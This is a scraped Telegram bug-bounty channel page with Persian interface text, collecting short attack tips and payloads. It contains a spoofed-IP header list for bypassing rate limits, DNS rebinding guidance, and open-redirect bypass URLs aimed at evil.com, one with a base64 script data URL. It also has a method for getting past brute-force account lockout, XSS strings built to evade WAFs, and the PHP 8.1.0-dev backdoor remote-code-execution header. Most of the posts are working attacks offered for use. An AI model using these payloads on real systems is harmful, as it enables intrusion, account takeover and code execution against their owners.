Bug Bounty - GitBook
رفتن به کانال در Telegram
Everything 4 bug bounty https://t.me/GiftWay32robot?start=_tgr_HwZ24DI5MWJk
نمایش بیشتر7 429
مشترکین
+424 ساعت
+207 روز
+16430 روز
آرشیو پست ها
7 432
Rate Limit Bypass using HTTP Headers
CACHE_INFO: 127.0.0.1 CF_CONNECTING_IP: 127.0.0.1 CF-Connecting-IP: 127.0.0.1 CLIENT_IP: 127.0.0.1 Client-IP: 127.0.0.1 COMING_FROM: 127.0.0.1 CONNECT_VIA_IP: 127.0.0.1 FORWARD_FOR: 127.0.0.1 FORWARD-FOR: 127.0.0.1 FORWARDED_FOR_IP: 127.0.0.1 FORWARDED_FOR: 127.0.0.1 FORWARDED-FOR-IP: 127.0.0.1 FORWARDED-FOR: 127.0.0.1 FORWARDED: 127.0.0.1 HTTP-CLIENT-IP: 127.0.0.1 HTTP-FORWARDED-FOR-IP: 127.0.0.1 HTTP-PC-REMOTE-ADDR: 127.0.0.1 HTTP-PROXY-CONNECTION: 127.0.0.1 HTTP-VIA: 127.0.0.1 HTTP-X-FORWARDED-FOR-IP: 127.0.0.1 HTTP-X-IMFORWARDS: 127.0.0.1 HTTP-XROXY-CONNECTION: 127.0.0.1 PC_REMOTE_ADDR: 127.0.0.1 PRAGMA: 127.0.0.1 PROXY_AUTHORIZATION: 127.0.0.1 PROXY_CONNECTION: 127.0.0.1 Proxy-Client-IP: 127.0.0.1 PROXY: 127.0.0.1 REMOTE_ADDR: 127.0.0.1 Source-IP: 127.0.0.1 True-Client-IP: 127.0.0.1 Via: 127.0.0.1 VIA: 127.0.0.1 WL-Proxy-Client-IP: 127.0.0.1 X_CLUSTER_CLIENT_IP: 127.0.0.1 X_COMING_FROM: 127.0.0.1 X_DELEGATE_REMOTE_HOST: 127.0.0.1 X_FORWARDED_FOR_IP: 127.0.0.1 X_FORWARDED_FOR: 127.0.0.1 X_FORWARDED: 127.0.0.1 X_IMFORWARDS: 127.0.0.1 X_LOCKING: 127.0.0.1 X_LOOKING: 127.0.0.1 X_REAL_IP: 127.0.0.1 X-Backend-Host: 127.0.0.1 X-BlueCoat-Via: 127.0.0.1 X-Cache-Info: 127.0.0.1 X-Forward-For: 127.0.0.1 X-Forwarded-By: 127.0.0.1 X-Forwarded-For-Original: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Forwarded-For: 127.0.0.1, 127.0.0.1, 127.0.0.1 X-Forwarded-Server: 127.0.0.1 X-Forwarded-Host: 127.0.0.1 X-From-IP: 127.0.0.1 X-From: 127.0.0.1 X-Gateway-Host: 127.0.0.1 X-Host: 127.0.0.1 X-Ip: 127.0.0.1 X-Original-Host: 127.0.0.1 X-Original-IP: 127.0.0.1 X-Original-Remote-Addr: 127.0.0.1 X-Original-Url: 127.0.0.1 X-Originally-Forwarded-For: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-ProxyMesh-IP: 127.0.0.1 X-ProxyUser-IP: 127.0.0.1 X-Real-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-True-Client-IP: 127.0.0.1 XONNECTION: 127.0.0.1 XPROXY: 127.0.0.1 XROXY_CONNECTION: 127.0.0.1 Z-Forwarded-For: 127.0.0.1 ZCACHE_CONTROL: 127.0.0.1
7 432
Rate Limit Bypass using HTTP Headers
CACHE_INFO: 127.0.0.1 CF_CONNECTING_IP: 127.0.0.1 CF-Connecting-IP: 127.0.0.1 CLIENT_IP: 127.0.0.1 Client-IP: 127.0.0.1 COMING_FROM: 127.0.0.1 CONNECT_VIA_IP: 127.0.0.1 FORWARD_FOR: 127.0.0.1 FORWARD-FOR: 127.0.0.1 FORWARDED_FOR_IP: 127.0.0.1 FORWARDED_FOR: 127.0.0.1 FORWARDED-FOR-IP: 127.0.0.1 FORWARDED-FOR: 127.0.0.1 FORWARDED: 127.0.0.1 HTTP-CLIENT-IP: 127.0.0.1 HTTP-FORWARDED-FOR-IP: 127.0.0.1 HTTP-PC-REMOTE-ADDR: 127.0.0.1 HTTP-PROXY-CONNECTION: 127.0.0.1 HTTP-VIA: 127.0.0.1 HTTP-X-FORWARDED-FOR-IP: 127.0.0.1 HTTP-X-IMFORWARDS: 127.0.0.1 HTTP-XROXY-CONNECTION: 127.0.0.1 PC_REMOTE_ADDR: 127.0.0.1 PRAGMA: 127.0.0.1 PROXY_AUTHORIZATION: 127.0.0.1 PROXY_CONNECTION: 127.0.0.1 Proxy-Client-IP: 127.0.0.1 PROXY: 127.0.0.1 REMOTE_ADDR: 127.0.0.1 Source-IP: 127.0.0.1 True-Client-IP: 127.0.0.1 Via: 127.0.0.1 VIA: 127.0.0.1 WL-Proxy-Client-IP: 127.0.0.1 X_CLUSTER_CLIENT_IP: 127.0.0.1 X_COMING_FROM: 127.0.0.1 X_DELEGATE_REMOTE_HOST: 127.0.0.1 X_FORWARDED_FOR_IP: 127.0.0.1 X_FORWARDED_FOR: 127.0.0.1 X_FORWARDED: 127.0.0.1 X_IMFORWARDS: 127.0.0.1 X_LOCKING: 127.0.0.1 X_LOOKING: 127.0.0.1 X_REAL_IP: 127.0.0.1 X-Backend-Host: 127.0.0.1 X-BlueCoat-Via: 127.0.0.1 X-Cache-Info: 127.0.0.1 X-Forward-For: 127.0.0.1 X-Forwarded-By: 127.0.0.1 X-Forwarded-For-Original: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Forwarded-For: 127.0.0.1, 127.0.0.1, 127.0.0.1 X-Forwarded-Server: 127.0.0.1 X-Forwarded-Host: 127.0.0.1 X-From-IP: 127.0.0.1 X-From: 127.0.0.1 X-Gateway-Host: 127.0.0.1 X-Host: 127.0.0.1 X-Ip: 127.0.0.1 X-Original-Host: 127.0.0.1 X-Original-IP: 127.0.0.1 X-Original-Remote-Addr: 127.0.0.1 X-Original-Url: 127.0.0.1 X-Originally-Forwarded-For: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-ProxyMesh-IP: 127.0.0.1 X-ProxyUser-IP: 127.0.0.1 X-Real-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-True-Client-IP: 127.0.0.1 XONNECTION: 127.0.0.1 XPROXY: 127.0.0.1 XROXY_CONNECTION: 127.0.0.1 Z-Forwarded-For: 127.0.0.1 ZCACHE_CONTROL: 127.0.0.1For more join to channel (: https://t.me/rootdr_research #Web #Payloads #bugbounty
7 432
If the target does not cache the DNS query then use dns rebinding to bypass security mechanism.
For example:
The server check's if the attacker.com does not point to localhost then the server makes a request to the attacker.com
Use dns rebinding to bypass it.
First set the ip to something valid, then when the dns request comes to attacker.com quickly change it to localhost.
7 432
🚀 بررسی بایپسهای بروز برای Open Redirect
اینجا میخوام یه سری از بایپسهای جدید و خلاقانه برای باگ Open Redirect رو بهتون بگم که باهاش راحت میتونین بایپس کنین!
🔥 اول از همه، تکنیک Subdomain Overloading
اگه سایت گیر بده که فقط دامنه خودش معتبره، میتونین از سابدامین جعلی استفاده کنین:
site.com/login?url=https://site.com.evil.com
اینجا دامنه اصلی رو اول گذاشتیم، اما دامنه مخرب توش مخفی شده و میتونین راحت ریدایرکت کنین.
🔥 بازی با TLD و Encoding
اینم یه روش توپ دیگه واسه بایپس کردن:
site.com/login?url=https://evil.com/%2E%2E%2E%2F
یا با هشتگ:
site.com/login?url=https://evil.com#site.com
اینجوری سرور فکر میکنه که دامنه اصلی معتبره.
🔥 Unicode !
site.com/login?url=https://evil.com%5Csite.com
یا:
site.com/login?url=https://evil.com%EF%BC%8Fsite.com
🔥 Open URL Wrapping
اگه دیدین سایت گیر میده، از لینکهای واسطه استفاده کنین. مثلا گوگل رو وسط ماجرا بندازین:
site.com/login?url=https://google.com/url?q=https://evil.com
خیلی جاها این جواب میده.
🔥 Data URL Injection
و اما شاهکار پایانی! با استفاده از Data URL میتونین مستقیم کد مخرب بندازین تو حلق سایت:
site.com/login?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnU3VwZXIhJyk8L3NjcmlwdD4=
خیلی حرفهای میتونین حمله کنین و تاثیرشو نشون بدین.
💡 جمعبندی
این بایپسها رو تست کنین:
سابدامین جعلی
کدگذاری مثل %2E و %5C
لینکهای واسطه مثل گوگل
Data URL برای تزریق داده
یادتون نره اگه تکنیک جدیدی پیدا کردین اینجا کامنت کنین تا بقیه هم یاد بگیرن!
🧑💻 دنیای باگ بانتی یعنی خلاقیت!
https://t.me/rootdr_research
#web
#bugbountt
7 432
You've been brute forcing an account but suddenly the account is locked.
Try this methods to bypass the locking mechanism:
1. Try to spoof the ip address using X-headers, hop by hop headers and etc ....
2. Use verb tampering to your advantage.
3. Try changing the request type.
4. Some times using crlf or null byte helps you out.
And etc ....
7 432
<22 foo="<img src=x onerror='alert(1)'">test</22>
this payload may help you to bypass WAF or trick sanitizers7 432
List of 1400 write-ups and reports from the HackerOne site
A great list where you can access a bank of write-ups based on your needs.
A lot of time has definitely been spent on this file, I hope you get the most out of it.
7 432
Circle of XSS WAF protection using invisible dividers before or after the name of the function
<IMG/SRC/ONERROR = ALERT (1337)>
<svg/onload = alert (2)>
Explanation:
You can insert invisible detector symbols (for example, Zero Width No-Break Space, Zero Width Space or inextricable gap) before or after the function of the function (for example, Alert). This helps to get around the filters and WAF (Web Application Firewall), which do not expect such characters inside the function of the function, and therefore do not block such attacks.
http://GitBook_s.t.me
7 432
Find a server running PHP 8.1.0-dev ❓
🚨 Check for easy RCE 🚨
👇 Payload:
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
#bugbountytips #bugbounty
اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 

